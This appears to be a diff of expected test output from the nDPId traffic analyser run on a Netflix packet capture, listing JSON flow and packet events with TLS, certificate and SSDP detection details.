-01364{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032986,"flow_last_seen":1484319033112,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3128,"flow_avg_l4_payload_len":446,"midstream":0,"ts_msec":1484319033112,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}}
+00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032986,"flow_last_seen":1484319033038,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1484319033038,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+00933{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032984,"flow_last_seen":1484319033086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":280,"midstream":0,"ts_msec":1484319033086,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032984,"flow_last_seen":1484319033087,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3128,"flow_avg_l4_payload_len":446,"midstream":0,"ts_msec":1484319033087,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}}
+00933{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032986,"flow_last_seen":1484319033098,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":280,"midstream":0,"ts_msec":1484319033098,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032986,"flow_last_seen":1484319033112,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3128,"flow_avg_l4_payload_len":446,"midstream":0,"ts_msec":1484319033112,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033206,"flow_last_seen":1484319033206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319033206,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1484319033206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319033206,"pkt":"gCqoTGHM5JjWH70UCABFAABAagpAAEAGFrrAqAEHNCDEJM99AbszkZRgAAAAALAC\/\/8LKQAAAgQFtAEDAwUBAQgKH2S5UQAAAAAEAgAA"}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1484319033258,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319033258,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGlqg0IMQkwKgBBwG7z33SmoRGM5GUYaASReoDCgAAAgQFtAQCCAq2m8WoH2S5UQEDAwg="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1484319033259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319033259,"pkt":"gCqoTGHM5JjWH70UCABFAAA0m4FAAEAG5U7AqAEHNCDEJM99AbszkZRh0pqER4AQEBVneAAAAQEICh9kuYW2m8Wo"}
-00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033206,"flow_last_seen":1484319033261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1484319033261,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033206,"flow_last_seen":1484319033312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1484319033312,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033206,"flow_last_seen":1484319033261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1484319033261,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033206,"flow_last_seen":1484319033312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1484319033312,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":143,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033631,"flow_last_seen":1484319033631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319033631,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1484319033631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319033631,"pkt":"gCqoTGHM5JjWH70UCABFAABAVMpAAEAGIQjAqAEHNkXM8c9+AbvPvqpAAAAAALAC\/\/9MiwAAAgQFtAEDAwUBAQgKH2S67gAAAAAEAgAA"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1484319033678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319033678,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGi7Y2RczxwKgBBwG7z36\/HDHnz76qQaASRepQUQAAAgQFtAQCCAqFp1CVH2S67gEDAwg="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1484319033680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319033680,"pkt":"gCqoTGHM5JjWH70UCABFAAA0\/p1AAEAGd0DAqAEHNkXM8c9+AbvPvqpBvxwx6IAQEBW0wwAAAQEICh9kux6Fp1CV"}
-00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033631,"flow_last_seen":1484319033681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1484319033681,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
-00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":148,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033631,"flow_last_seen":1484319033734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1484319033734,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
-01336{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319033631,"flow_last_seen":1484319033735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"ts_msec":1484319033735,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}}
+00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033631,"flow_last_seen":1484319033681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1484319033681,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+00932{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":148,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033631,"flow_last_seen":1484319033734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1484319033734,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+01362{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319033631,"flow_last_seen":1484319033735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"ts_msec":1484319033735,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033886,"flow_last_seen":1484319033886,"flow_idle_time":180000,"flow_min_l4_payload_len":122,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":122,"midstream":0,"ts_msec":1484319033886,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","src_port":53776,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00599{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1484319033886,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":164,"pkt_l4_len":130,"ts_msec":1484319033886,"pkt":"AQBef\/\/65JjWH70UCABFAACWfwIAAAERiKvAqAEH7\/\/\/+tIQB2wAggqVTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMg0KU1Q6IHVybjptZHgtbmV0ZmxpeC1jb206c2VydmljZTp0YXJnZXQ6MA0KDQo="}
-00612{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033886,"flow_last_seen":1484319033886,"flow_idle_time":180000,"flow_min_l4_payload_len":122,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":122,"midstream":0,"ts_msec":1484319033886,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","src_port":53776,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033886,"flow_last_seen":1484319033886,"flow_idle_time":180000,"flow_min_l4_payload_len":122,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":122,"midstream":0,"ts_msec":1484319033886,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","src_port":53776,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033943,"flow_last_seen":1484319033943,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319033943,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1484319033943,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319033943,"pkt":"gCqoTGHM5JjWH70UCABFAABAxzpAAEAGrpfAqAEHNkXM8c9\/Abtb3TwWAAAAALAC\/\/8tbQAAAgQFtAEDAwUBAQgKH2S8FwAAAAAEAgAA"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1484319033988,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319033988,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGjLY2RczxwKgBBwG7z39IJeEpW908F6ASRer4mgAAAgQFtAQCCAqFp1DiH2S8FwEDAwg="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1484319033990,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319033990,"pkt":"gCqoTGHM5JjWH70UCABFAAA0N8lAAEAGPhXAqAEHNkXM8c9\/Abtb3TwXSCXhKoAQEBVdDAAAAQEICh9kvEiFp1Di"}
 00603{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1484319033993,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"ts_msec":1484319033993,"pkt":"AQBef\/\/65JjWH70UCABFAACZ8KEAAAERFwnAqAEH7\/\/\/+tIQB2wAhUYzTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMg0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQo="}
